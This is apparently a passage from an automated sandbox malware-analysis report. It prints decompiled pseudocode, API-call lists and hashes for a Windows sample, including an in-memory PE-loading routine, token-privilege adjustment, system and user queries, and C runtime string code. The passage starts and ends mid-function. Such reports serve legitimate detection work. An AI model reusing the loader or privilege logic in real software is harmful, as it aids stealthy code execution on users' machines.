                                                                                                                        							 *((intOrPtr*)(_t66 + 8)) = 0;
                                                                                                                        							 *((intOrPtr*)(_t66 + 0x10)) = 0;
                                                                                                                        							VirtualAlloc(_t47,  *(_t60 + 0x50), 0x1000, 4); // executed
                                                                                                                        							_t27 = VirtualAlloc(_t47,  *(_t60 + 0x54), 0x1000, 4);
                                                                                                                        							_t12 = _t69 + 0x3c; // 0x89ffffff
                                                                                                                        							 *(_t70 + 0x14) = _t27;
                                                                                                                        							E0040E0C0(_t47, _t60, _t66, _t27, _t69,  *_t12 +  *(_t60 + 0x54));
                                                                                                                        							_t15 = _t69 + 0x3c; // 0x89ffffff
                                                                                                                        							_push(_t66);
                                                                                                                        							_t30 =  *((intOrPtr*)(_t70 + 0x20)) +  *_t15;
                                                                                                                        							_push(_t60);
                                                                                                                        							 *_t66 = _t30;
                                                                                                                        							_push(_t69);
                                                                                                                        							 *(_t30 + 0x34) = _t47;
                                                                                                                        							E004051E0();
                                                                                                                        							_t71 = _t70 + 0x18;
                                                                                                                        							_t33 = _t47 !=  *(_t60 + 0x34);
                                                                                                                        							if(_t47 !=  *(_t60 + 0x34)) {
                                                                                                                        								E00405340(_t66, _t33);
                                                                                                                        								_t71 = _t71 + 4;
                                                                                                                        							}
                                                                                                                        							_push(_t66);
                                                                                                                        							_t34 = E004053C0();
                                                                                                                        							_push(_t66);
                                                                                                                        							if(_t34 != 0) {
                                                                                                                        								E00405270();
                                                                                                                        								if( *((intOrPtr*)( *_t66 + 0x28)) != 0) {
                                                                                                                        									 *((intOrPtr*)(_t66 + 0x10)) = 1;
                                                                                                                        								}
                                                                                                                        								return _t47;
                                                                                                                        							} else {
                                                                                                                        								E004054E0();
                                                                                                                        								E0040ED5F();
                                                                                                                        								goto L10;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t43 = VirtualAlloc(_t47,  *(_t60 + 0x50), 0x2000, 4); // executed
                                                                                                                        							_t47 = _t43;
                                                                                                                        							if(_t47 == 0) {
                                                                                                                        								L10:
                                                                                                                        								return 0;
                                                                                                                        							} else {
                                                                                                                        								goto L6;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ed38872e0c83db5bfeb2f107bba3bc63feea66a5ce3c092865b56f89bd48357d
                                                                                                                        • Instruction ID: 43a54962534115526fd1075b69c186f34754c5d537961be6f8ace8771f72133d
                                                                                                                        • Opcode Fuzzy Hash: ed38872e0c83db5bfeb2f107bba3bc63feea66a5ce3c092865b56f89bd48357d
                                                                                                                        • Instruction Fuzzy Hash: 983190B1600701AFE7109FA9DC85B6777A8EB48718F04453AFA09A7291D7B8F814CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012BA5FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2874748243-0
                                                                                                                        • Opcode ID: b11408a2e7234e5ee383cd55e673a6e0add407bda3eff2db50e93d4f8c1a23e8
                                                                                                                        • Instruction ID: e85ca55f20ffe456c91e873175b1ff7e0666af1d6f93dac58a6597d829223f2b
                                                                                                                        • Opcode Fuzzy Hash: b11408a2e7234e5ee383cd55e673a6e0add407bda3eff2db50e93d4f8c1a23e8
                                                                                                                        • Instruction Fuzzy Hash: 0721D1755097809FDB138F25DC84B92BFB4EF06310F0884DAE9858F163D375A908DB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012BA5FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2874748243-0
                                                                                                                        • Opcode ID: b909f772c689dfa4b7cf2ec0bc00ec03339003e6fc174e5b0c03606b2413e583
                                                                                                                        • Instruction ID: 134d4ecb018386baa391e1a757fa2053695a77995ba8168cd26af71275da97da
                                                                                                                        • Opcode Fuzzy Hash: b909f772c689dfa4b7cf2ec0bc00ec03339003e6fc174e5b0c03606b2413e583
                                                                                                                        • Instruction Fuzzy Hash: B111A0719107009FDB21CF59E885BA6FBE4EF44320F08C46AEE458B652D375E458DB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 012BAD7D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3562636166-0
                                                                                                                        • Opcode ID: b15c3f6b5d789da310e8805b852269cd61724a2f74685fcc3f59eede68b03370
                                                                                                                        • Instruction ID: 513e046d2a3d59f17bd8069a46c5e2392bfd7a9a3a65402a0a852e5947e59283
                                                                                                                        • Opcode Fuzzy Hash: b15c3f6b5d789da310e8805b852269cd61724a2f74685fcc3f59eede68b03370
                                                                                                                        • Instruction Fuzzy Hash: 161186754097809FD7228F15DC44B62FFB4EF46310F08C49EEE854B563D275A918DB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000E30,?,?), ref: 012BAC2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2645101109-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: recv
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1507349165-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 012BAD7D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616177190.00000000012BA000.00000040.00000001.sdmp, Offset: 012BA000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3562636166-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00418F50(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                        				signed int _v8;
                                                                                                                        				int _v12;
                                                                                                                        				int _v16;
                                                                                                                        				int _v20;
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				void* _v36;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t110;
                                                                                                                        				intOrPtr _t112;
                                                                                                                        				intOrPtr _t113;
                                                                                                                        				short* _t115;
                                                                                                                        				short* _t116;
                                                                                                                        				char* _t120;
                                                                                                                        				short* _t121;
                                                                                                                        				short* _t123;
                                                                                                                        				short* _t127;
                                                                                                                        				int _t128;
                                                                                                                        				short* _t141;
                                                                                                                        				signed int _t144;
                                                                                                                        				void* _t146;
                                                                                                                        				short* _t147;
                                                                                                                        				signed int _t150;
                                                                                                                        				short* _t153;
                                                                                                                        				char* _t157;
                                                                                                                        				int _t160;
                                                                                                                        				int _t161;
                                                                                                                        				long _t162;
                                                                                                                        				signed int _t174;
                                                                                                                        				signed int _t178;
                                                                                                                        				signed int _t179;
                                                                                                                        				int _t182;
                                                                                                                        				short* _t184;
                                                                                                                        				signed int _t186;
                                                                                                                        				signed int _t188;
                                                                                                                        				short* _t189;
                                                                                                                        				int _t191;
                                                                                                                        				int _t207;
                                                                                                                        
                                                                                                                        				_t110 =  *0x4228b4; // 0xb87af74f
                                                                                                                        				_v8 = _t110 ^ _t188;
                                                                                                                        				_t184 = __ecx;
                                                                                                                        				if( *0x4241bc == 0) {
                                                                                                                        					_t182 = 1;
                                                                                                                        					_t161 = LCMapStringW(0, 0x100, 0x420398, 1, 0, 0); // executed
                                                                                                                        					if(_t161 == 0) {
                                                                                                                        						_t162 = GetLastError();
                                                                                                                        						__eflags = _t162 - 0x78;
                                                                                                                        						if(_t162 == 0x78) {
                                                                                                                        							 *0x4241bc = 2;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						 *0x4241bc = 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				if(_a16 <= 0) {
                                                                                                                        					L13:
                                                                                                                        					_t112 =  *0x4241bc;
                                                                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                                                                        						_v16 = 0;
                                                                                                                        						_v20 = 0;
                                                                                                                        						__eflags = _a4;
                                                                                                                        						if(_a4 == 0) {
                                                                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                        						}
                                                                                                                        						__eflags = _a28;
                                                                                                                        						if(_a28 == 0) {
                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                        						}
                                                                                                                        						_t113 = E004198F0(0, _t179, _t182, _t184, _a4);
                                                                                                                        						_v24 = _t113;
                                                                                                                        						__eflags = _t113 - 0xffffffff;
                                                                                                                        						if(_t113 != 0xffffffff) {
                                                                                                                        							__eflags = _t113 - _a28;
                                                                                                                        							if(_t113 == _a28) {
                                                                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                        								L78:
                                                                                                                        								__eflags = _v16;
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									_push(_v16);
                                                                                                                        									E0040E815(0, _t182, _t184, __eflags);
                                                                                                                        								}
                                                                                                                        								_t115 = _v20;
                                                                                                                        								__eflags = _t115;
                                                                                                                        								if(_t115 != 0) {
                                                                                                                        									__eflags = _a20 - _t115;
                                                                                                                        									if(__eflags != 0) {
                                                                                                                        										_push(_t115);
                                                                                                                        										E0040E815(0, _t182, _t184, __eflags);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t116 = _t184;
                                                                                                                        								goto L84;
                                                                                                                        							}
                                                                                                                        							_t120 = E00419939(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                        							_t191 =  &(_t189[0xc]);
                                                                                                                        							_v16 = _t120;
                                                                                                                        							__eflags = _t120;
                                                                                                                        							if(_t120 == 0) {
                                                                                                                        								goto L58;
                                                                                                                        							}
                                                                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                        							_v12 = _t121;
                                                                                                                        							__eflags = _t121;
                                                                                                                        							if(__eflags != 0) {
                                                                                                                        								if(__eflags <= 0) {
                                                                                                                        									L71:
                                                                                                                        									_t182 = 0;
                                                                                                                        									__eflags = 0;
                                                                                                                        									L72:
                                                                                                                        									__eflags = _t182;
                                                                                                                        									if(_t182 == 0) {
                                                                                                                        										goto L62;
                                                                                                                        									}
                                                                                                                        									E0040E430(_t182, _t182, 0, _v12);
                                                                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                        									_v12 = _t123;
                                                                                                                        									__eflags = _t123;
                                                                                                                        									if(_t123 != 0) {
                                                                                                                        										_t186 = E00419939(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                        										_v20 = _t186;
                                                                                                                        										asm("sbb esi, esi");
                                                                                                                        										_t184 =  ~_t186 & _v12;
                                                                                                                        										__eflags = _t184;
                                                                                                                        									} else {
                                                                                                                        										_t184 = 0;
                                                                                                                        									}
                                                                                                                        									E00416C40(_t182);
                                                                                                                        									goto L78;
                                                                                                                        								}
                                                                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                                                                        								if(_t121 > 0xffffffe0) {
                                                                                                                        									goto L71;
                                                                                                                        								}
                                                                                                                        								_t127 =  &(_t121[4]);
                                                                                                                        								__eflags = _t127 - 0x400;
                                                                                                                        								if(_t127 > 0x400) {
                                                                                                                        									_t128 = E0040DFE9(0, _t179, _t182, _t127);
                                                                                                                        									__eflags = _t128;
                                                                                                                        									if(_t128 != 0) {
                                                                                                                        										 *_t128 = 0xdddd;
                                                                                                                        										_t128 = _t128 + 8;
                                                                                                                        										__eflags = _t128;
                                                                                                                        									}
                                                                                                                        									_t182 = _t128;
                                                                                                                        									goto L72;
                                                                                                                        								}
                                                                                                                        								E00419AF0(_t127);
                                                                                                                        								_t182 = _t191;
                                                                                                                        								__eflags = _t182;
                                                                                                                        								if(_t182 == 0) {
                                                                                                                        									goto L62;
                                                                                                                        								}
                                                                                                                        								 *_t182 = 0xcccc;
                                                                                                                        								_t182 = _t182 + 8;
                                                                                                                        								goto L72;
                                                                                                                        							}
                                                                                                                        							L62:
                                                                                                                        							_t184 = 0;
                                                                                                                        							goto L78;
                                                                                                                        						} else {
                                                                                                                        							goto L58;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if(_t112 != 1) {
                                                                                                                        							L58:
                                                                                                                        							_t116 = 0;
                                                                                                                        							L84:
                                                                                                                        							return E00415C0B(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                        						}
                                                                                                                        						_v12 = 0;
                                                                                                                        						if(_a28 == 0) {
                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                        						}
                                                                                                                        						_t184 = MultiByteToWideChar;
                                                                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                        						_t207 = _t182;
                                                                                                                        						if(_t207 == 0) {
                                                                                                                        							goto L58;
                                                                                                                        						} else {
                                                                                                                        							if(_t207 <= 0) {
                                                                                                                        								L28:
                                                                                                                        								_v16 = 0;
                                                                                                                        								L29:
                                                                                                                        								if(_v16 == 0) {
                                                                                                                        									goto L58;
                                                                                                                        								}
                                                                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                        									L52:
                                                                                                                        									E00416C40(_v16);
                                                                                                                        									_t116 = _v12;
                                                                                                                        									goto L84;
                                                                                                                        								}
                                                                                                                        								_t184 = LCMapStringW;
                                                                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                        								_v12 = _t174;
                                                                                                                        								if(_t174 == 0) {
                                                                                                                        									goto L52;
                                                                                                                        								}
                                                                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                                                                        									__eflags = _t174;
                                                                                                                        									if(_t174 <= 0) {
                                                                                                                        										L44:
                                                                                                                        										_t184 = 0;
                                                                                                                        										__eflags = 0;
                                                                                                                        										L45:
                                                                                                                        										__eflags = _t184;
                                                                                                                        										if(_t184 != 0) {
                                                                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                        											__eflags = _t141;
                                                                                                                        											if(_t141 != 0) {
                                                                                                                        												_push(0);
                                                                                                                        												_push(0);
                                                                                                                        												__eflags = _a24;
                                                                                                                        												if(_a24 != 0) {
                                                                                                                        													_push(_a24);
                                                                                                                        													_push(_a20);
                                                                                                                        												} else {
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        												}
                                                                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                        											}
                                                                                                                        											E00416C40(_t184);
                                                                                                                        										}
                                                                                                                        										goto L52;
                                                                                                                        									}
                                                                                                                        									_t144 = 0xffffffe0;
                                                                                                                        									_t179 = _t144 % _t174;
                                                                                                                        									__eflags = _t144 / _t174 - 2;
                                                                                                                        									if(_t144 / _t174 < 2) {
                                                                                                                        										goto L44;
                                                                                                                        									}
                                                                                                                        									_t52 = _t174 + 8; // 0x8
                                                                                                                        									_t146 = _t174 + _t52;
                                                                                                                        									__eflags = _t146 - 0x400;
                                                                                                                        									if(_t146 > 0x400) {
                                                                                                                        										_t147 = E0040DFE9(0, _t179, _t182, _t146);
                                                                                                                        										__eflags = _t147;
                                                                                                                        										if(_t147 != 0) {
                                                                                                                        											 *_t147 = 0xdddd;
                                                                                                                        											_t147 =  &(_t147[4]);
                                                                                                                        											__eflags = _t147;
                                                                                                                        										}
                                                                                                                        										_t184 = _t147;
                                                                                                                        										goto L45;
                                                                                                                        									}
                                                                                                                        									E00419AF0(_t146);
                                                                                                                        									_t184 = _t189;
                                                                                                                        									__eflags = _t184;
                                                                                                                        									if(_t184 == 0) {
                                                                                                                        										goto L52;
                                                                                                                        									}
                                                                                                                        									 *_t184 = 0xcccc;
                                                                                                                        									_t184 =  &(_t184[4]);
                                                                                                                        									goto L45;
                                                                                                                        								}
                                                                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                        								}
                                                                                                                        								goto L52;
                                                                                                                        							}
                                                                                                                        							_t150 = 0xffffffe0;
                                                                                                                        							_t179 = _t150 % _t182;
                                                                                                                        							if(_t150 / _t182 < 2) {
                                                                                                                        								goto L28;
                                                                                                                        							}
                                                                                                                        							_t25 = _t182 + 8; // 0x8
                                                                                                                        							_t152 = _t182 + _t25;
                                                                                                                        							if(_t182 + _t25 > 0x400) {
                                                                                                                        								_t153 = E0040DFE9(0, _t179, _t182, _t152);
                                                                                                                        								__eflags = _t153;
                                                                                                                        								if(_t153 == 0) {
                                                                                                                        									L27:
                                                                                                                        									_v16 = _t153;
                                                                                                                        									goto L29;
                                                                                                                        								}
                                                                                                                        								 *_t153 = 0xdddd;
                                                                                                                        								L26:
                                                                                                                        								_t153 =  &(_t153[4]);
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							E00419AF0(_t152);
                                                                                                                        							_t153 = _t189;
                                                                                                                        							if(_t153 == 0) {
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							 *_t153 = 0xcccc;
                                                                                                                        							goto L26;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t178 = _a16;
                                                                                                                        				_t157 = _a12;
                                                                                                                        				while(1) {
                                                                                                                        					_t178 = _t178 - 1;
                                                                                                                        					if( *_t157 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t157 =  &(_t157[1]);
                                                                                                                        					if(_t178 != 0) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					_t178 = _t178 | 0xffffffff;
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				_t160 = _a16 - _t178 - 1;
                                                                                                                        				if(_t160 < _a16) {
                                                                                                                        					_t160 = _t160 + 1;
                                                                                                                        				}
                                                                                                                        				_a16 = _t160;
                                                                                                                        				goto L13;
                                                                                                                        			}











































                                                                                                                        0x00000000
                                                                                                                        0x0041922b
                                                                                                                        0x00419202
                                                                                                                        0x00419202
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00418fe6
                                                                                                                        0x00418fe9
                                                                                                                        0x004191bb
                                                                                                                        0x004191bb
                                                                                                                        0x004192e3
                                                                                                                        0x004192f4
                                                                                                                        0x004192f4
                                                                                                                        0x00418fef
                                                                                                                        0x00418ff5
                                                                                                                        0x00418ffc
                                                                                                                        0x00418ffc
                                                                                                                        0x00418fff
                                                                                                                        0x00419022
                                                                                                                        0x00419024
                                                                                                                        0x00419026
                                                                                                                        0x00000000
                                                                                                                        0x0041902c
                                                                                                                        0x0041902c
                                                                                                                        0x00419071
                                                                                                                        0x00419071
                                                                                                                        0x00419074
                                                                                                                        0x00419077
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419090
                                                                                                                        0x00419179
                                                                                                                        0x0041917c
                                                                                                                        0x00419181
                                                                                                                        0x00000000
                                                                                                                        0x00419184
                                                                                                                        0x00419096
                                                                                                                        0x004190aa
                                                                                                                        0x004190ac
                                                                                                                        0x004190b1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004190be
                                                                                                                        0x004190e9
                                                                                                                        0x004190eb
                                                                                                                        0x00419132
                                                                                                                        0x00419132
                                                                                                                        0x00419132
                                                                                                                        0x00419134
                                                                                                                        0x00419134
                                                                                                                        0x00419136
                                                                                                                        0x00419146
                                                                                                                        0x0041914c
                                                                                                                        0x0041914e
                                                                                                                        0x00419150
                                                                                                                        0x00419151
                                                                                                                        0x00419152
                                                                                                                        0x00419155
                                                                                                                        0x0041915b
                                                                                                                        0x0041915e
                                                                                                                        0x00419157
                                                                                                                        0x00419157
                                                                                                                        0x00419158
                                                                                                                        0x00419158
                                                                                                                        0x0041916f
                                                                                                                        0x0041916f
                                                                                                                        0x00419173
                                                                                                                        0x00419178
                                                                                                                        0x00000000
                                                                                                                        0x00419136
                                                                                                                        0x004190f1
                                                                                                                        0x004190f2
                                                                                                                        0x004190f4
                                                                                                                        0x004190f7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004190f9
                                                                                                                        0x004190f9
                                                                                                                        0x004190fd
                                                                                                                        0x00419102
                                                                                                                        0x0041911b
                                                                                                                        0x00419121
                                                                                                                        0x00419123
                                                                                                                        0x00419125
                                                                                                                        0x0041912b
                                                                                                                        0x0041912b
                                                                                                                        0x0041912b
                                                                                                                        0x0041912e
                                                                                                                        0x00000000
                                                                                                                        0x0041912e
                                                                                                                        0x00419104
                                                                                                                        0x00419109
                                                                                                                        0x0041910b
                                                                                                                        0x0041910d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0041910f
                                                                                                                        0x00419115
                                                                                                                        0x00000000
                                                                                                                        0x00419115
                                                                                                                        0x004190c3
                                                                                                                        0x004190e2
                                                                                                                        0x004190e2
                                                                                                                        0x00000000
                                                                                                                        0x004190c3
                                                                                                                        0x00419032
                                                                                                                        0x00419033
                                                                                                                        0x00419038
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0041903a
                                                                                                                        0x0041903a
                                                                                                                        0x00419043
                                                                                                                        0x00419059
                                                                                                                        0x0041905f
                                                                                                                        0x00419061
                                                                                                                        0x0041906c
                                                                                                                        0x0041906c
                                                                                                                        0x00000000
                                                                                                                        0x0041906c
                                                                                                                        0x00419063
                                                                                                                        0x00419069
                                                                                                                        0x00419069
                                                                                                                        0x00000000
                                                                                                                        0x00419069
                                                                                                                        0x00419045
                                                                                                                        0x0041904a
                                                                                                                        0x0041904e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419050
                                                                                                                        0x00000000
                                                                                                                        0x00419050
                                                                                                                        0x00419026
                                                                                                                        0x00418fd8
                                                                                                                        0x00418fae
                                                                                                                        0x00418fb1
                                                                                                                        0x00418fb4
                                                                                                                        0x00418fb4
                                                                                                                        0x00418fb7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00418fb9
                                                                                                                        0x00418fbc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00418fbe
                                                                                                                        0x00000000
                                                                                                                        0x00418fbe
                                                                                                                        0x00418fc6
                                                                                                                        0x00418fca
                                                                                                                        0x00418fcc
                                                                                                                        0x00418fcc
                                                                                                                        0x00418fcd
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00418F82
                                                                                                                        • GetLastError.KERNEL32(?,00420F70,00000010), ref: 00418F94
                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00419020
                                                                                                                        • _malloc.LIBCMT ref: 00419059
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00420F70,00000010), ref: 0041908C
                                                                                                                        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00420F70,00000010), ref: 004190A8
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 004190E2
                                                                                                                        • _malloc.LIBCMT ref: 0041911B
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00419146
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00419169
                                                                                                                        • __freea.LIBCMT ref: 00419173
                                                                                                                        • __freea.LIBCMT ref: 0041917C
                                                                                                                        • ___ansicp.LIBCMT ref: 004191AD
                                                                                                                        • ___convertcp.LIBCMT ref: 004191D8
                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 004191F9
                                                                                                                        • _malloc.LIBCMT ref: 00419231
                                                                                                                        • _memset.LIBCMT ref: 00419253
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041926B
                                                                                                                        • ___convertcp.LIBCMT ref: 00419289
                                                                                                                        • __freea.LIBCMT ref: 0041929E
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 004192B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3809854901-0
                                                                                                                        • Opcode ID: 9ec857312dc48b369f6b49b06491985e719d539030cbf376f21f299ec58edebf
                                                                                                                        • Instruction ID: cd74215ce49cf6b34db5a0ea1268125e3de14cb0b55a5a9190ba2128f9fa2f59
                                                                                                                        • Opcode Fuzzy Hash: 9ec857312dc48b369f6b49b06491985e719d539030cbf376f21f299ec58edebf
                                                                                                                        • Instruction Fuzzy Hash: E1B1BD7290011ABFDF219FA0CC948EF3BB6EB48314F14456BF915A2260D7398DE1DB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 75%
                                                                                                                        			E00401270(void* __ecx, void* __edx) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				void* _t38;
                                                                                                                        				void* _t39;
                                                                                                                        				intOrPtr _t44;
                                                                                                                        				void* _t62;
                                                                                                                        				long _t63;
                                                                                                                        				void* _t68;
                                                                                                                        				void* _t76;
                                                                                                                        				void* _t85;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				void* _t87;
                                                                                                                        				void* _t89;
                                                                                                                        				intOrPtr _t90;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				long _t93;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				void* _t100;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t109;
                                                                                                                        
                                                                                                                        				_t76 = __edx;
                                                                                                                        				_t68 = __ecx;
                                                                                                                        				_t87 =  *(_t97 + 0x14);
                                                                                                                        				_t85 = 0;
                                                                                                                        				 *((intOrPtr*)(_t97 + 8)) = 0;
                                                                                                                        				if(_t87 == 0 ||  *((intOrPtr*)(_t97 + 0x1c)) == 0 ||  *(_t97 + 0x20) == 0) {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t62 = _t87;
                                                                                                                        					 *(_t97 + 0x18) = 0;
                                                                                                                        					 *(_t97 + 0x14) = 0;
                                                                                                                        					_t89 = _t87;
                                                                                                                        					if( *_t87 == 0xe9) {
                                                                                                                        						 *(_t97 + 0x18) = 5;
                                                                                                                        						_t89 =  *((intOrPtr*)(_t87 + 1)) + _t87;
                                                                                                                        						_t109 = _t89;
                                                                                                                        						 *(_t97 + 0x14) = 1;
                                                                                                                        					}
                                                                                                                        					do {
